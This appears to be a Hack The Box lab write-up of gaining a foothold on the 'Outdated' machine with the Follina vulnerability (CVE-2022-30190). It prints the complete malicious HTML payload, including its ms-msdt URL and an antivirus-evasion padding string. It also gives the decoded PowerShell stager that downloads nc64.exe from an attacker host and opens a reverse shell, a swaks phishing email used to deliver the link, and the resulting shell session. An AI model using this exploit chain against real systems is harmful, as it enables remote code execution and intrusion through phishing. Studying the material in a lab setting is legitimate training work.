Outdated_Exploitation

CVE-2022-30190 (Follina)

---

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ python3 follina.py --interface tun0 -p 80 --reverse 9999
[+] copied staging doc /tmp/s9ph64ug
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9999' 
listening on [any] 9999 ...

Executing the [[Outdated_CVE-2022-30190#[Exploit](https //github.com/JohnHammond/msdt-follina)|exploit script]] copies and hosts the stager at a temporary directory

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ ll /tmp/s9ph64ug    
total 24K
4.0k drwxr-xr-x  2 kali kali 4.0k jan  5 14:31 www
4.0k drwxr-xr-x  4 kali kali 4.0k jan  5 14:31 .
 12k drwxrwxrwt 27 root root  12k jan  5 14:31 ..
4.0k drwxr-xr-x  5 kali kali 4.0k jan  5 14:01 doc

Like so.

┌──(kali㉿kali)-[~/archive/htb/labs/outdated]
└─$ cat /tmp/s9ph64ug/www/index.html
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vMTAuMTAuMTQuMjM6MjIyMi9uYzY0LmV4ZSAtT3V0RmlsZSBDOlxXaW5kb3dzXHRlbXBcbmM2NC5leGU7IEM6XFdpbmRvd3NcdGVtcFxuYzY0LmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjIzIDk5OTk='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //shbxvgkqbtwyrcnlwecbiaaxujrqqhucwfjngftogotmjmjhlaubtpvepybkftvwjxagfbfqeemteuizseibtiqeuqvlsenjazivwzizfzteruyguetangpcijkehddyaxjwufmnjbwookrmchxxtxfmxrmpufefwejxnjltxuyfwyztgxrksvnhkfcvvjbhfdhkhrlqkpcjxnxpbekewhqiihbwhtwtrargafbitkakimriuznglanokxskfavbfqliqcxjqtcxmpaogbtctpuydrfjiwpywsjzysgticbpwxmigjfrsnhbrbvcspiwncpuwcwutwrhiagrlzfebjbaxwshubvlcdfqjipatlwytvrjnxnlifxmgucfxqflyreokojvvgpozjfvrhkjgowojytwljfxkiekmxwmxmnxehpzrnkpncdfkepjosxqeejdrkmilvhjqcpvgzhwqbyodehwhpabgtzgslaonegmfhrimgbgmegcrupuhjodqltfezlgixkkkifcszpkjxudcpgnfdywqqpfjfhhcwphxusplwgembrnoukkvvnjtjovtuykyuvvekwsbhgmcopnphpwwilvksqktxtvtvxpqkcncxvmwxcavlphvmvegsmlrvqqkhxkjkfkxghsfiuczsjdldjrtiwbpxffcjzevuiebcenzizoyehsqlqjkgkqdkuoeliljlwzezmbxhfzdmievqilbxamdjedcvvrdxbvwfaixgfyxmixtptmekngiilzlyofcgbbchzkmnhhieimhtvgneqthweozgwydhdnfswhkqlipsbydzljqerbloeogfbjqpwqgyxfzhrmiyobjyqmgdebpovvinuhserwjsbtqqddfnubyuuiktawxgozjkvshqdviwgelghntbicjobjbeohyswhwtfptqfsrbfpesjzcacvqqsuhkcfruuwhlemxshuhxhdngntgcymjfoxqmsvjlucvqvkrscvceeqilruujdvexxemkflhfndyqzjquyvkfhxlswlgkwsfecjsnvssbreipchltbkgxfxpzctuhgcjlsgrzfjhrynsewrpbvywffzxidysrmixuvfvsdkxlqophwiapiudzhabagqwikiolsifxrrbgxhcmqgfgvpttjoboaymojmshghoprpepbvjnvypjyegfbvegvfmyyttirtgjugsisczpjwiiecmgijcyqtnvfsvrkwbjxmxpowlledqegyksvbftvdptqwbiqjonpmrpodvihpmvcnbbaeykgrdslknkkrfdxyjrdmhgijjyzkfjtwwnnofqejagztvzffsqpncnxnfmrwwipoaijhxskxwqnezecojnpggjwqgeoqjcydzrusuokojuiflmkxkfyeupdqpghnhduqrthvewxskibasawwjzixanhgylchoshuycqwhgpkqxukkgebkycdlysernwctcjqjoylzpnndboanmwnedcmllbmovqiicwsdxcudjccbjjrazeecgxqbtxujuxjumdyegttwkacstfeliixqdbqvmgypgsauptdialoexkcenstywxiamnupnaujwsmsumtccfvdiuspeaylxivqjhialpqdrpjtfhnbfxfqicqxabuutziazxbscakzifixjhpjwydniemyoknecqlytddahdpaklyyaldewvkumjwkmuvaaepchvhhhoexegjrqwtrrcyrxtncamryzqrjjbkhgvqaqzrqzzmrtytnlhgcosbbttifhdgdxdnrhcqhqikwoljwdwgkfedpstpqsiflbupxunkppdwgxbbxomovgvuauptziwjzyjmmmocqtymayhpxnvifrijpwgycboqdyqpfobhfkaocouozafbpqncgpgjeqbbaoiafcrmryyjppkdgcpeqocqffrojaaqvtdexbokrhruktvwzwyoghchnnwtpptoosxaphsewxdogzljxqyfpwkglxqjjyxjmxqtiavdpjmqabtzaiceqecqjvmljkgicplxjmmuvwoudpnpsoammlyaopwwldqasmzvqioqzyapfjqynzyilceecjiobvrwxotjeymtawpbvaqraxcifauovpvzujsxlcndbuanrvijqyiiszhbpwjsgkhfifswxirqmuncttkkdrrrocxofxhlsugxtieldwgyzgqwkdrcdhdtnmlwzwxxwegiouypvkvefdfnsqzzjfswngvkovgowhsrhlvpxjoksvygleelfpcqmqriswmuizfiyqzrtzqdgpfhyiqmyqyzorvpuohmewyylcjcklbrfipeqqzxfykdoxmkreoolrydnvakpzutsemhqtxhzvapqzgtjfwocobaqjzejweshpzrzhlmkbcpfmathuuwozjkivbrlpeszvukparyspwsoshrzqdevtwkcezxqnqapfjodrcbjacwblanzbwqddzfoxskjdsydyvliuxviadsaabcugjlrimsqxcbwsrywxbwbkziexglqqejixrtcxstfodhdxwerxgatwifdxsgcmggyyyhvpiypbmbytacbadwwbottistzeztdawjgarundupogxtjotdznbsryeonngdmqgjifgioobmdvpxjwhdkiqltvjgmwkigmpwudvhqeqloscvbdoeadbsautzpiqcxykwzlklaetsvrhwlimiosamyhohstzmltfqzxpinchejlwsyavyxggjvmnerregbjppnicglgkdtrjygqhpfcmpcqsazikrlcrxbjunrgubbdqqqhwcgutbnielkvzkmnmtyimgfiugbctataizzngfxktrzrnkluyowrgmiujstlwrdafxxehohzggkgkvadibcwqttierbhkarfvituskqssswebfemtiizgxqvefmbqxkuwxalyyckyoqrukainbrnspcplvjiyoheveluthridcqdjbdvedvadmkcetoonswnwpcxcsgvnapetzhpdwdccqeiznzhrknchevemvjapigveinpsokfpdhcczmdowrdmknkpckujsjskpyrfrdjvdullkbsxemjygirxqddwksgpbgcjttrtwxcqsroelxrifadsfxmshkpzswxiemfcmdeqdvpmsykqzuvjasflqmwxlfeuskfvtgceweaydsrhmtoowwctaqclflwautricnlvhuukthiuzvxobdngopdimmefrswiwpavtydpkzrfwimhnytynuuimphooiosjrlntokqibrowxsofcxzbulgyolhjrcbqfuurtqiegbqbsfvtqslositqgpatvuuogqbardsmrvkrxiewphipqxcaabfasbqmepdbitjmvrysodqusjcuuswcndzxbttfepefrlcmvtqehcotbcdhgsigjafttdpycfttigurrqsblfntrygmmcbvtmdopkogexzjeuqlevavhvyzvistwosaqixebacvgwtwoeiadnyclcdtdnbavjksnqkgximengwkezyrlybswkzrlcoillfrcdzqcxgcmkjtqlnqjctqwoloadxmsvwfthxpfushdkndeluzjnxaeqrsiohfcnaythqiyxomzgcpwolmfojuwdsvtftqenvjqfmrophofbobcgyxqrgabmmpnhffluvivubkmvjayxbimmvybbdposaltenorsqorptctfkysydergipsmkxoofpsmpdyepgopffejeesnqfhxgadyhcfhqjsgiryenellmttfxdiqgdbfahuygkaeekcdyvxjavkkckziydzqrnxqrvficjuqnmkgmrxftgcdhlpiyvrwmdbkwqmjhavshzspdohfowvalyiretgolfzoizbembhgjibylsystxdbvqqzddjdfnqzjmdiwliuhiaulfzusiyebikfsnipytnrdpmwgfzldpxtsnlenvpbmnmbvwacnuedzasijuzsxkeentiydjkarumzmltosithkevttflbnymcmokiiwhirurjdogmnczkvfinjoeltyzstgabjvddou
</script>

aside from the arbitrary string that is 4096-byte long for av evasion, the index file contains javascript that points to a the ms-msdt:// URL, which will invokes the Microsoft Support Diagnostic Tool that is assumed to be running internally.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ echo SW52b2tlLVdlYlJlcXVlc3QgLVVyaSBodHRwOi8vMTAuMTAuMTQuMjM6MjIyMi9uYzY0LmV4ZSAtT3V0RmlsZSBDOlxXaW5kb3dzXHRlbXBcbmM2NC5leGU7IEM6XFdpbmRvd3NcdGVtcFxuYzY0LmV4ZSAtZSBjbWQuZXhlIDEwLjEwLjE0LjIzIDk5OTk= | base64 -d
invoke-webrequest -uri http://10.10.14.23:2222/nc64.exe -OutFile C:\Windows\temp\nc64.exe; C:\Windows\temp\nc64.exe -e cmd.exe 10.10.14.23 9999                                                                                                                                        

Then it will execute the base64-encoded payload, which is served over HTTP on the kali port 2222

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ swaks --to itsupport@outdated.htb --from qwe@qwe --header "subject: Internal Web App" --body "http://10.10.14.23/" --server $IP
=== trying 10.10.11.175:25...
=== Connected to 10.10.11.175.
<-  220 mail.outdated.htb ESMTP
 -> EHLO kali
<-  250-mail.outdated.htb
<-  250-SIZE 20480000
<-  250-AUTH LOGIN
<-  250 HELP
 -> mail from:<qwe@qwe>
<-  250 OK
 -> rcpt to:<itsupport@outdated.htb>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> date: Fri, 05 Jan 2024 14:39:45 +0100
 -> to: itsupport@outdated.htb
 -> from: qwe@qwe
 -> subject: Internal Web App
 -> message-id: <20240105143945.129217@kali>
 -> x-mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
 -> 
 -> http://10.10.14.23/
 -> 
 -> 
 -> .
<-  250 Queued (10.734 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.

Using swaks, I can send out the URL to itsupport@outdated.htb The automated PowerShell script will, once again, fetch the URL and send a GET request to it

There it is.

┌──(kali㉿kali)-[~/…/htb/labs/outdated/msdt-follina]
└─$ python3 follina.py --interface tun0 -p 80 --reverse 9999
[+] copied staging doc /tmp/s9ph64ug
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 9999' 
listening on [any] 9999 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.11.175] 49809
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> whoami
 whoami
outdated\btables
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> hostname
 hostname
client
 
c:\Users\btables\AppData\Local\Temp\SDIAG_71a862c0-30ab-4385-903d-574557cf66b4> ipconfig
 ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet:
 
   connection-specific dns suffix  . : 
   ipv4 address. . . . . . . . . . . : 172.16.20.20
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 172.16.20.1

Payload is executed and a session is established to the 172.16.20.20 host Initial Foothold established to an internal containerized host, client, as the btables user via exploiting [[Outdated_CVE-2022-30190#[CVE-2022-30190](https //msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190) (Follina)|CVE-2022-30190]]